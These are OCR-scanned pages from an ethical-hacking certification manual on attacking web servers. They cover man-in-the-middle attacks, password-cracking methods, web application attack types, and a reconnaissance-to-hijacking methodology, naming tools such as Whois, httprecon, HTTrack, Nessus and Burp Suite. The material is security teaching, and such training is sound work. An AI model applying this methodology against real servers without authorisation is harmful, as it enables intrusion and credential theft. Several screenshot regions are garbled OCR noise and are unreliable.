Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

M a n ‫־‬i n ‫־‬t h e ‫־‬M i d d l e A tta c k
A man-in-the-middle attack is a method where an intruder intercepts or modifies the
message being exchanged between the user and web server through eavesdropping or
intruding into a connection. This allows an attacker to steal sensitive information of a user
such as online banking details, user names, passwords, etc. transferred over the Internet to the
web server. The attacker lures the victim to connect to the web server through by pretending
to be a proxy. If the victim believes and agrees to the attacker's request, then all the
communication between the user and the web server passes through the attacker. Thus, the
attacker can steal sensitive user information.

Module 12 Page 1629

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

n
U

Exam 312-50 Certified Ethical Hacker

Normal Traffic

User visits a website

>•‫״‬
User

^‫־‬

&

© .
* * * ..

'''• ^ 9 0

*
Attacker sniffs the
communication to ;
stealI session IDs

(f t v

s
© e ..*

< ‫* • .־‬
e
^

,., w

.• ,‫5יי‬
‫־‬
''.•‫־‬
A•
• ‘‘

Attacker
FIGURE 12.12: Man-in-the-Middle Attack

Module 12 Page 1630

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

W ebserver P assw ord C rack in g

C EH

An attacker tries to exploit
weaknesses to hack well-chosen
passwords

****

Many hacking attempts start

The most common passwords

with cracking passwords and

found are password, root,
administrator, admin, demo, test,

proves to the Webserver that
they are a valid user

guest, qwerty, pet names, etc.

Attackers use different methods
such as social engineering,

Web form authentication cracking

spoofing, phishing, using a Trojan

SSH Tunnels

Horse or virus, wiretapping,

FTP servers

keystroke logging, etc.

SMTP servers
Web shares

Copyright © by E - * n i . All Rights Reserved. Reproduction is Strictly Prohibited.
GGacl

W eb S e rv e r P a s s w o rd C ra c k in g
-----

Most hacking starts with password cracking only. Once the password is cracked, the

hacker can log in in to the network as an authorized person. Most of the common passwords
found are password, root, administrator, admin, demo, test, guest, QWERTY, pet names, etc.
Attackers use different methods such as social engineering, spoofing, phishing, using a Trojan
horse or virus, wiretapping, keystroke logging, a brute force attack, a dictionary attack, etc. to
crack passwords.
Attackers mainly target:
©

W eb form authentication cracking

©

SSH tunnels

0 FTP servers
©

SMTP servers

©

W eb shares

Module 12 Page 1631

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

W ebserver Password C racking
Techniques

EH

Passwords may be cracked manually or with automated tools such as Cain and Abel, Brutus,
THC Hydra, etc.

I

Passwords can be cracked by using following techniques:

4

Hybrid
Attack

A hybrid attack
works similar to
dictionary attack,
but it adds numbers
or symbols to the
password attempt

Copyright © by E - * n i . All Rights Reserved. Reproduction is Strictly Prohibited.
GCacl

W eb S erver P assw o rd C ra c k in g T e c h n iq u e s

■gd©
® ‫_ ( 77 ) רדד׳‬

Passwords may be cracked manually or with automated tools such as Cain & Abel,
Brutus, THC Hydra, etc. Attackers follow various techniques to crack the password:
©

Guessing: A common cracking method used by attackers is to guess passwords either by
humans or by automated tools provided with dictionaries. Most people tend to use heir
pets' names, loved ones' names, license plate numbers, dates of birth, or other weak
pass words such as "QW ERTY," "password," "admin," etc. so that they can remember
them easily. The same thing allows the attacker to crack passwords by guessing.

©

Dictionary Attack: A dictionary attack is a method that has predefined words of various
combinations, but this might also not be possible to be effective if the password consists
of special characters and symbols, but compared to a brute force attack this is less time
consuming.

©

Brute Force Attack: In the brute force method, all possible characters are tested, for
example, uppercase from "A to Z" or numbers from "0 to 9" or lowercase "a to z." But
this type of method is useful to identify one-word or two-word passwords. Whereas if a
password consists of uppercase and lowercase letters and special characters, it might
take months or years to crack the password, which is practically impossible.

Module 12 Page 1632

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Q

Exam 312-50 Certified Ethical Hacker

Hybrid Attack: A hybrid attack is more powerful as it uses both a dictionary attack and
brute force attack. It also consists of symbols and numbers. Password cracking becomes
easier with this method.

Module 12 Page 1633

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

Web Application Attacks
J

!

CEH

C«rt1fW
4

itfciul Nm Im

Vulnerabilities in web applications running on a Webserver provide a broad attack path for
Webserver compromise

, If
enia'0 f.s
T eCt°rv

C°okie

rO Site
ss.
rge,

A t,

'° n

4 ■ cks Olv
ft, a ‫׳‬erf/,

s ‫' ׳‬ring
»Pe,

Note: For complete coverage of web application attacks refer to Module 13: Hacking Web Applications
Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

W e b A p p l i c a t i o n A tt a c k s
SL

Vulnerabilities in web applications running on a web server provide a broad attack

path for web server compromise.

Directory Traversal
Directory traversal is exploitation of HTTP through which attackers are able to access
restricted directories and execute commands outside of the web server root directory
by manipulating a URL.

Parameter/Form Tampering
This type of tampering attack is intended to manipulate the parameters exchanged
between client and server in order to modify application data, such as user credentials
and permissions, price and quantity of products, etc.

Cookie Tampering
Cookie tampering is the method of poisoning or tampering with the cookie of the
client. The phases where most of the attacks are done are when sending a cookie from
the client side to the server. Persistent and non-persistent cookies can be modified by using
different tools.

Module 12 Page 1634

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

Command Injection Attacks
Command injection is an attacking method in which a hacker alters the content of the

m

web page by using html code and by identifying the form fields that lack valid

constraints.

Buffer Overflow Attacks

I

Most web applications are designed to sustain some amount of data. If that amount
is exceeded, the application may crash or may exhibit some other vulnerable

behavior. The attacker uses this advantage and floods the applications with too much data,
which in turn causes a buffer overflow attack.

Cross-Site Scripting (XSS) Attacks
jr

Cross-site scripting is a method where an attacker injects HTML tags or scripts into a
target website.

Denial-of-Service (DoS) Attack

M

A denial-of-service attack is a form of attack method intended to terminate the
operations of a website or a server and make it unavailable to access for intended

users.

Unvalidated Input and File injection Attacks
Unvalidated input and file injection attacks refer to the attacks carried by supplying
an unvalidated input or by injecting files into a web application.

Cross-Site Request Forgery (CSRF) Attack
The user's web browser is requested by a malicious web page to send requests to a
malicious website where various vulnerable actions are performed, which are not
intended by the user. This kind of attack is dangerous in the case of financial websites.

SQL Injection Attacks
SQL injection is a code injection technique that uses the security vulnerability of a
database for attacks. The attacker injects malicious code into the strings that are later
on passed on to SQL Server for execution.

Session Hijacking

1131

Session hijacking is an attack where the attacker exploits, steals, predicts, and

negotiates the real valid web session control mechanism to access the authenticated
parts of a web application.

Module 12 Page 1635

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

M odule Flow

CEH

Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

M o d u l e F lo w
_

So far we have discussed web server concepts and various techniques used by the

attacker to hack web server. Attackers usually hack a web server by following a procedural
method. Now we will discuss the attack methodology used by attackers to compromise web
servers.

Webserver Concepts

Webserver Attacks

Attack Methodology

1

Webserver Attack Tools

Webserver Pen Testing

y

Patch Management

i

)

■—
■—

Webserver Security Tools

Counter-measures

This section provides insight into the attack methodology and tools that help at various stages
of hacking.

Module 12 Page 1636

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

-

W ebserver Attack M ethodology

Information
Gathering

C EH

W ebserver
Footprinting

Vulnerability
Scanning

H a ck in g
W e b se rve r Passw ords

Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

W e b S e r v e r A tta c k M e t h o d o l o g y
Hacking a web server is accomplished in various stages. At each stage the attacker
tries to gather more information about loopholes and tries to gain unauthorized access to the
web server. The stages of web server attack methodology include:

Inform ation G athering

0

Every attacker tries to collect as much information as possible about the target web

server. Once the information is gathered, he or she then analyzes the gathered information in
order to find the security lapses in the current mechanism of the web server.

(

W eb Server Footprinting
The purpose of footprinting is to gather more information about security aspects of a
web server with the help of tools or footprinting techniques. The main purpose is to know

about its remote access capabilities, its ports and services, and the aspects of its security.

M irroring W ebsite
W

4 J)

Website mirroring is a method of copying a website and its content onto another
server for offline browsing.

V ulnerability Scanning

Module 12 Page 1637

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

Vulnerability scanning is a method of finding various vulnerabilities and misconfigurations of a
web server. Vulnerability scanning is done with the help of various automated tools known as
vulnerable scanners.

Session H ijacking
Session hijacking is possible once the current session of the client is identified. Complete
control of the user session is taken over by the attacker by means of session hijacking.

H acking Web Server Passw ords
Attackers use various password cracking methods like brute force attacks, hybrid
attacks, dictionary attacks, etc. and crack web server passwords.

Module 12 Page 1638

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

Webserver Attack Methodology:
Information Gathering
Information gathering involves collecting information about the
targeted company

CEH

WHOis.net
Y3ur Domain Starting Place...

Attackers search the Internet, newsgroups, bulletin boards, etc.

UZ3

for information about the company
Attackers use Whois, Traceroute, Active Whois, etc. tools and
query the Whois databases to get the details such as a domain

WHOIS information for ebay.com:***
[Querying who1s.vens1gn-grs.com]
[whols.verislgn-grs.com]
Who»s Server Vereon 2.0
Domain names in the .com and .net domains can now be reoistered
with rrorv diftoront competing raaistrars. Go to http;///ww .intom <x«t
for detailed information.
Domain Name: EBAY.COM
Registrar: MARKM0N1T0R INC.
Whois Server: whois.maricwiitjor.com
Reterral URL: http://www.marXmonicor.com
Name Server: yC-ONSl.CDAYDNS.COM

name, an IP address, or an autonomous system number

N 0ooS DS.bADS O
3 Sr f JCN BYN M
m v:
2 .C

Note: For complete coverage of information gathering techniques
refer to Module 02: Footprinting and Reconnaissance

N3m« sorvor: SMF UNSl.fcBAYDNS.COM
Name Server: SMF-DNSi.fcBAYDNS.COM
Status: dleotDeletcPiohlblted
Status: clieritTrmsf«Pral1ibit*d
Status: dienWpdnt*Prohibit*d
Status: s e rv e d eteProhibited
Status: server TransterProh 1 itod
b
Status: sorvorUDdateProhibital
updated Date: 15-Sep-2010
Creation Date: 04-aug-l995
Expiration Date: 03-aug-2018

h :/ w ww o .n t
ttp / w . h is e
Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

»
W eb
S e rv e r
$ , G a th e rin g
__

A t ta c k

M e th o d o l o g y :

In fo rm a tio n

Every attacker before hacking first collects all the required information such as versions and
technologies being used by the web server, etc. Attackers search the Internet, newsgroups,
bulletin boards, etc. for information about the company. Most of the attackers' time is spent in
the phase of information gathering only. That's why information gathering is both an art as
well as a science. There are many tools that can be used for information gathering or to get
details such as a domain name, an IP address, or an autonomous system number. The tools
include:
e
e

Traceroute

e

Active Whois

e

Nmap

0

Angry IP Scanner

e

#

Whois

Netcat

W hois

Module 12 Page 1639

Ethical Hacking and Countermeasures Copyright © by EC-C0l1nCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

Source: http://www.whois.net
Whois allows you to perform a domain whois search and a whois IP lookup and search the
whois database for relevant information on domain registration and availability. This can help
provide insight into a domain's history and additional information. It can be used for
performing a search to see who owns a domain name, how many pages from a site are listed
with Google, or even search the Whois address listings for a website's owner.

W H O is .n e t
Y o u r D o m a in S t a r t i n g P l a c e . . .

WHOIS information for ebay.com:***
[Querying whois.verisign-grs.com]
[whois.verisign-grs.com]
Whois Server Version 2.0
Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.
Domain Name: EBAY.COM
Registrar: MARKMONITOR INC.
Whois Server: whois.markmonitDr.com
Referral URL: http://www.markmonitor.com
Name Server: SJC-DNS1.EBAYDNS.COM
Name Server: SJC-DNS2.EBAYDNS.COM
Name Server: SMF-DNS1.EBAYDNS.COM
Name Server: SMF-DNS2.EBAYDNS.COM
Status: dientDeleteProhibited
Status: dientTransferProhibited
Status: dientUpdateProhibited
Status: serverDeleteProhibited
Status: serverTransferProhibited
Status: serverUpdateProhibited
Updated Date: 15-sep2010‫־‬
Creation Date: 04-aug-1995
Expiration Date: 03-aug2018‫־‬

«
F IG U R E 1 2 .1 3 : W H O I S In f o r m a t io n G a t h e r in g

Module 12 Page 1640

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

Webserver Attack Methodology:
Webserver Footprinting
J

Telnet a Webserver to footprint a Webserver and
gather information such as server name, server
type, operating systems, applications running,
etc.

J

ilhiul lUthM

Gather valuable system-level information such
as account details, operating system, software
versions, server names, and database schema
details

J

C EH
Urt1fw4

Use tool such as ID Serve, httprecon, and
Netcraft to perform footprinting

Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

W e b S e r v e r A tta c k M e th o d o l o g y : W e b s e r v e r
F o o tp rin tin g
The purpose of footprinting is to gather account details, operating system and other software
versions, server names, and database schema details and as much information as

possible

about security aspects of a target web server or network. The main purpose is to know about its
remote access capabilities, open ports and services, and the security mechanisms implemented.
Telnet a web server to footprint a web server and gather information such as server name,
server type, operating systems, applications running, etc. Examples of tools used for performing
footprinting include ID Serve, httprecon, Netcraft, etc.

N etcraft
Source: http://toolbar.netcraft.com
Netcraft is a tool used to determine the OSes in use by the target organization. It has already
been discussed in detail in the Footprinting and Reconnaissance module.

Module 12 Page 1641

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

r iE T C K A F T
Se a rch W e b by Domain
Explore 1,045.745 web sites visited by users of the Netcraft Toolbar

3rd August 2012

S e a rc h :

search tips

j site contains

j«‫ ׳‬microsoft
^

lookup!

e x a m p le : s it e c o n t a in s .n e tc r a ft.c o m

Results for microsoft
Found 252 sites
Site

Site Report First seen

1.

w w w .m icro s o ft.co m

2.

s u p p o r t.m ic r o s o ft.c o m

3.

te c h n e t.m ic r o s o ft .c o m

4.

w in d ov< s.m icrosoft.co m

5.

m s d n .m ic r o s o ft .c o m

6.

o ffic e .m ic r o s o ft.c o m

7.

s o c ia l.t e c h n e t .m ic ro s o ft .c o m

8.

a n s w e r s .m ic r o s o ft.c o m

9.

v 4 w w .u p d a te.m icro s o ft.c o m

10. s o c ia l.m s d n .m ic r o s o ft .c o m

a
m
m
0
a
£1
a
£1
a
0

Netblock

OS
citrix n e t s c a le r

a u g u s t 1995

m ic ro s o ft corp

o c to b e r 1997

m ic ro s o ft corp

unknow n

a u g u s t 1999

m ic ro s o ft corp

citrix n e t s c a le r

ju n e 1998

m ic ro s o ft corp

S e p t e m b e r 1998 m ic ro s o ft corp

window s s e r v e r 2 0 0 8
citrix n e t s c a le r

n o v e m b e r 1998

m ic ro s o ft corp

unknow n

a u g u st 2008

m ic ro s o ft corp

citrix n e t s c a le r

au g u st 2009

m ic ro s o ft lim ite d

window s s e r v e r 2 0 0 8

m a y 2007

m ic ro s o ft corp

window s s e r v e r 2 0 0 8

a u g u st 2008

m ic ro s o ft corp

citrix n e t s c a le r
citrix n e t s c a le r

11. g o .m ic r o s o ft.c o m

a

n o v e m b e r 2001

m s h o tm a il

12. w in d o w s u p d a te .m ic r o s o ft.co m

a
a
a
m

fe b u a r y 1 9 9 9

m ic ro s o ft corp

w in d ow s s e r v e r 2 0 0 8

fe b u a r y 2 0 0 5

m ic ro s o ft corp

w in d ow s s e r v e r 2 0 0 8

13. u p d a t e .m ic r o s o ft.c o m
14. w w w .m ic ro s o fttra n s la to r.c o m
15. s e a r c h .m ic r o s o ft .c o m

n o v e m b e r 2008

a k a m a i te c h n o lo g ie s

lin u x

ja n u a r y 1997

a k a m a i in t e r n a t io n a l b .v

lin u x

16. w w .m ic r o s o fts t o r e .c o m

a

n o v e m b e r 2008

d ig ita l riv e r ir e la n d ltd.

f5 b ig ‫ ־‬ip

17. lo g in .m ic r o s o fto n lin e .c o m

£1
IB

d ecem b er 2010

m ic ro s o ft corp

w in d ow s s e r v e r 2 0 0 3

o c to b e r 2 0 0 5

m ic ro s o ft corp

w in d ow s s e r v e r 2 0 0 8

18. w e r.m ic r o s o ft.c o m

F IG U R E 1 2 .1 4 : W e b s e r v e r F o o t p r in t in g

Module 12 Page 1642

Ethical Hacking and Countermeasures Copyright © by EC-COUIlCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

Webserver Footprinting Tools
httprecon 7.3 - http://www.nytimes.com:80/
File

C o n fig u ra tio n

F in g e rp rin tin g

R ep crtin g

CEH

I—I°

H elp

Ta*get (Sun ONE W eb Server 6.1)
| h t b :/ /

^

| www.nytimes.com

: 180

0

H
TTP/1.1 2 0 O
0 K
D
ace: Thu, 1 Oct 2 1 09:34:37 G T
1
02
M
expires: Thu, 0 D 1 9 16:00:00 G T
1 ec 9 4
M
carhe-control: no-cache
pragm no-cache
a:
Sec-Cookie: ALT_ID 007f010021bb479dd5aa00SS; Expires
=
09:34:37 G T Path= D ain‫. ־‬nytim
M;
/; om
e3.com
;
Sec-cookie: adxcs= path=/; do!rain=.nytim ca
-;
es. m
Matehfct (352 Implementations) | Fingerprint Details | Report Preview |

a

Oracle Application Server

10g 10.1.2.2.0
7.0

Sun Java System W eb Server

•

ID S e r v e
Background

'
C
2

Errte* 0* copy

Copyright (c) 2003 by Gibson Research Corp.

Serv2r Query
I paste an Internet

|

Q8A/Help

1111

SSm

|

server UR_ or IP address here (example: www.microsdt.com):

|www.google.coml

Quety The S ever

w
^

W hen an Internet URL ‫ זה‬IP has been provided above,
piess this button to initiate a query of the specified server.

S w vei query pcocessng

(3

Abyss

V

Internet Server Identifica.ion Utility, v l .02
Personal Security Freeware by Stev Gibson
Steve

Name

•S

V
V

‫י ^־‬

ID Serve

GET existing j GET lo n g e q u e s tj GET non-ex sting] GET wrong p rotocol)

2.5.0.0 X1
Apache 2.0.52
Apache 2.2.6
ru— 1 n c n______________________
—

Server gws
Content-Length: 221
X‫־‬X S S ‫־‬Protectior: 1 mode-block
;
X‫־‬Frome‫־‬Options: SAMEORIGIN
Connection: close

F
■

Ready
The seivei identified Ise* a s :

http://www.computec.ch

(4

Goto ID Serve web page

http://www. grc.com
Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

W e b S e r v e r F o o t p r i n t i n g T o o ls
W e have already discussed about the Netcraft tool. In addition to the Netcraft tool,
there are two more tools that allow you to perform web server footprinting. They are
Httprecon and ID Serve.

H ttprecon
(

^

' Source: http://www.computec.ch

Httprecon is a tool for advanced web server fingerprinting. The httprecon project is doing some
research in the field of web server fingerprinting, also known as http fingerprinting. The goal is
the highly accurate identification of given httpd implementations. This software shall improve
the ease and efficiency of this kind of enumeration.

Module 12 Page 1643

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

httprecon 7.3 - http://www.nytimes.com:80/
F ile

C o n fig u r a tio n

F in g e r p r in t in g

R e p o r t in g

— ‫ם‬

H e lp

T a r g e t ( S u n O N E W e b S e r v e r G .1 )

http:/‫/׳‬

▼I

G E T e x is tin g

A n a ly z e

80

|w w w . n y t im e s . c o m

| G E T lo n g r e q u e s t | G E T n o n - e x istin g

 G E T w r o n g p r o t o c o l | H E A D e x is tin g | O P T I O N S c o m m o n

HTTP/1.1 200 O
K
Date: Thu, 11 Oct 2012 09:34:37 G T
M
Server: Apache
expires: Thu, 01 Dec 1994 16:00:00 G T
M
cache-control: no-cache
pragma: no-cache
Set-Cookie: ALT_ID=007f010021bb479ddSaa005S; Expires=Fri, 11 Oct 2013
09:34:37 GM Path=/; Domain=.nytimes.com
T;
;
Set-cookie: adxca=-; path=/; domain=.nytimes.com
Vary: Host
M a t c h lis t ( 3 5 2 Im p le m e n ta t io n s )

| F in g e r p rin t D e t a ils | R e p o r t P r e v i e w

N am e
M

I H its

M a tch

%

O r a c l e A p p lic a t io n S e r v e r 1 0 g 1 0 .1 .2 .2 .0

58

H22

S u n J a v a S y s t e m W e b S e r v e r 7 .0

57

8 0 .2 8 1 6 3 0 1 4 0 8 4 5 1

#

A b y s s 2 .5 .0 .0 X 1

56

7 8 .8 7 3 2 3 3 4 3 6 6 1 3 7

A p a c h e 2 .0 .5 2

56

7 8 .8 7 3 2 3 3 4 3 6 6 1 3 7

A p a c h e 2 .2 .6

56

7 8 .8 7 3 2 3 3 4 3 6 6 1 3 7

EC

/‫׳‬

8 1 .6 3 0 1 4 0 8 4 5 0 7 0 4

0 7 0 000,1 70‫ ־‬OCC1 □7

V ‫׳‬

n c n

Ready.

FIGURE 12.15: Httprecon Screenshot

ID Serve
Source: http://www.grc.com
ID Serve is a simple Internet server identification utility. ID Serve can almost always identify the
make, model, and version of any website's server software. This information is usually sent in
the preamble of replies to web queries, but it is not shown to the user. ID Serve can also
connect with non-web servers to receive and report that server's greeting message. This
generally reveals the server's make, model, version, and other potentially useful information.
Simply by entering any IP address, ID Serve will attempt to determine the associated domain
name.

Module 12 Page 1644

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

G

ID Serve

ID Serve

I n t e r n e t S e r v e r I d e n t i f i c a t i o n U t ilit y , v 1 .02

B a ck g ro u n d

|

S e rv e r Q u e ry

P e r s o n a l S e c u r it y F r e e w a r e b y S t e v e G ib s o n

Copyright (c) 2003 by Gibson Research Corp.
Q & A / H e lp

Enter or copy I paste an Internet server URL or IP address here (example: www.microsoft.com):

1

w ww.google.com |

Query The Server

When an Internet URL or IP has been provided above,
press this button to initiate a query of the specified server.

^

Server query processing:
S e rv e r: gw s
C o n t e n t - L e n g t h : 221
X - X S S - P r o t e c t i o n : 1; m o d e = b l o c k
X - F r a m e - O p tio n s : S A M E O R I G I N
C o n n e c tio n : c lo s e

(4
Copy

The server identified itself as :

|gws__________________

Goto ID Serve web page

Exit

FIGURE 12.16: ID Serve

Module 12 Page 1645

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

Webserver Attack Methodology:
Mirroring a Website

CEH

Mirror a website to create a complete profile of the site's directory structure, files structure, external links, etc
Search for comments and other items in the HTML source code to make footprinting activities more efficient
Use tools HTTrack, WebCopier Pro, BlackWidow, etc. to mirror a website

H

Site mirroring in progress [2/14 (+13), 327948 bytes] - [Test ProjecLMrttJ

E*€ Freferences Mirro
13 ii, local Disk <(

log

Window Help
Pa‫׳*־‬g HTM fife
L

w

m

r

til . MyWebSlte*
‫ש‬
ProgramRes
)It) *. ProgramFits WKi
i 111
lh«s
til , t Windows
i
NTUSSR.DAT 1 1•
•*
>local Disk *D
:
«;
M
D RW Drivt ‫<&י‬
VD
:N«wVolum» <
F1

320.26*8
laved
2nr22»
Tiro.
08* tf.19KB/»)
-a.rfe-rdLe
Ac*ve correct !one4

1

1

W a ic rtB !

0
0
14

HrcdcdaMd.

7 ;Men*:

Ji

M
«

J□
h :/ w wh c .c m
ttp / w . ttro k o
Copyright © by E - t i c l All Rights Reserved. Reproduction is Strictly Prohibited.
GGlni.

W e b S e r v e r A tta c k M e th o d o l o g y : M i r r o r i n g a W e b s it e
—

Website mirroring is a method of copying a website and its content onto another

server. By mirroring a website, a complete profile of the site's directory structure, file structure,
external links, etc. is created. Once the mirror website is created, search for comments and
other items in the HTML source code to make footprinting activities more efficient. Various
tools used for web server mirroring include HTTrack, W ebripper 2.0, W inW SD , Webcopier, and
Blackwidow.

C
Source: http://www.httrack.com
HTTrack is an offline browser utility. It allows you to download a World W ide W eb site from the
Internet to a local directory, building recursively all directories, getting HTML, images, and other
files from the server to your computer. HTTrack arranges the original site's relative linkstructure. Simply open a page of the "mirrored" website in your browser, and you can browse
the site from link to link, as if you were viewing it online.

Module 12 Page 1646

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

H

Exam 312-50 Certified Ethical Hacker

Site mirroring in progress [2/14 (+13), 327948 bytes] - [Test Project.whtt]

File

Preferences

terror

B j j Local Disk <C:>
0
CEH-Tools
j H J . dell
a i.
B
B t
g) ••Jj
a ‫׳‬j
J

inetpub
Intel
MyWebSites
Program Files
Program Files (x86)

& J 1 Users
a
Windows
L Q NTUSER.DAT

Log

Window

JHelp
In progress:

Parang HTML He

Information
Bytes saved:
320.26KB
Time:
2min22s
Transferrate:
OB/s (1.19MB/s)
Active connections: 1

Links scanned:
Files written:
Fles updated:
Errors:

2/14 (.13)
14

0
0

[Actions

a a

Local Disk <D:>
DVD RW Drive <E:>
El , . New Volume <F:>

;B
ack |

Next >

Cancel

Help

FIGURE 12.17: Mirroring a Website

Module 12 Page 1647

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

W e b s e rv e r A tta c k M e th o d o lo g y :
V u ln e ra b ility S c a n n in g

CEH

Perform vulnerability scanning to identify weaknesses
in a network and determine if the system can be exploited

J

Sniff the network traffic to find out active systems,
netw ork services, applications, and vulnerabilities present

Use a vulnerability scanner such as HP Weblnspect,
Nessus, Zaproxy, etc. to find hosts, services, and
vulnerabilities

J

Test the web server infrastructure for any
misconfiguration, outdated content, and known
vulnerabilities

Copyright © by K-€M ICil. All Rights Reserved. Reproduction Is Strictly Prohibited.

W eb
S e rv e r
S c a n n in g

A tta c k

M e th o d o lo g y :

V u ln e ra b ility

Vulnerability scanning is a method of determining various vulnerabilities and misconfigurations
of a target web server or network. Vulnerability scanning is done with the help of various
automated tools known as vulnerable scanners.
Vulnerability scanning allows determining the vulnerabilities that exist in the web server and its
configuration. Thus, it helps to determine whether the web server is exploitable or not. Sniffing
techniques are adopted in the network traffic to find out active systems, network services,
applications, and vulnerabilities present.
Also, attackers test the web server infrastructure for any misconfiguration, outdated content,
and known vulnerabilities. Various tools are used for vulnerability scanning such as HP
Weblnspect, Nessus, Paros proxy, etc. to find hosts, services, and vulnerabilities.

N essus
Source: http://www.nessus.org
Nessus is a security scanning tools that scan the system remotely and reports if it detects the
vulnerabilities before the attacker actually attacks and compromises them. Its five features
includes high-speed discovery, configuration auditing, asset profiling, sensitive data discovery,
patch management integration, and vulnerability analysis of your security posture with features
Module 12 Page 1648

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

that enhance usability, effectiveness, efficiency, and communication with all parts of your
organization.

FIGURE 1 2 .1 8 : N essus S c re e n s h o t

Module 12 Page 1649

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

W e b s e r v e r A tta c k M e th o d o lo g y :

C EH

S e s s io n H ija c k in g
Sniff valid session IDs to gain unauthorized access to the Web Server and snoop the data

Use session hijacking techniques such as session fixation, session sidejacking, Cross-site scripting, etc. to capture valid
session cookies and IDs
Use tools such as Burp Suite, Hamster, Firesheep, etc. to automate session hijacking

l‫ ־‬l ° W

burp suite free edition v1A01
J curp intruder repeater
target

window about
s:arinei - intrude! f repeats! | sequence! [ ceccflet [ comparer

options ' alerts

ig not found items hiding CSS image and gereral ainarr content 1iS-g .l«-e=pcn=e= h d ng ?mrt/folders
http:A conom dime 5 indiatime s o
le
i

host
h«p/«*d*orc

0 9
0

hltpVJedition cnn m

°‫ •ם־‬Irr* - -—
w"1 - iVedifion c
http

;‫׳ ״‬

MIME typi
HTML‫־‬

/»8n«nr5s1/3<ls1»3mcs;

add item to 9cope
cpiaortnis branch
arfrvely scan this branch
passively scan this branch
engagement took [pro version onlf]
compare site maps
eipand branch

5: ‫ר0נפ‬

oxpana rcquoctca noms
delete branch
copy URL# in this blanch
copy iioks in tnis oranch
save selected items

reaueat

‫ |~־¥י‬params

headers [ hex |

T / . • L«»«nc.'* 1 1 / m r 1 ‫ ׳‬brea*r1ng_n*v•/3 . 0 /banner. ntral ?c m h d » c * 11
T P / 1 .1
8c: e d it io n .c n n .co »
ec-Affe&t: K c s illd / S .O 1
Vind0¥3 I1T 6 .2 ; W0V61; c v : J S .0 l
cko/:0100101 F ir e f o x / 15.0.1
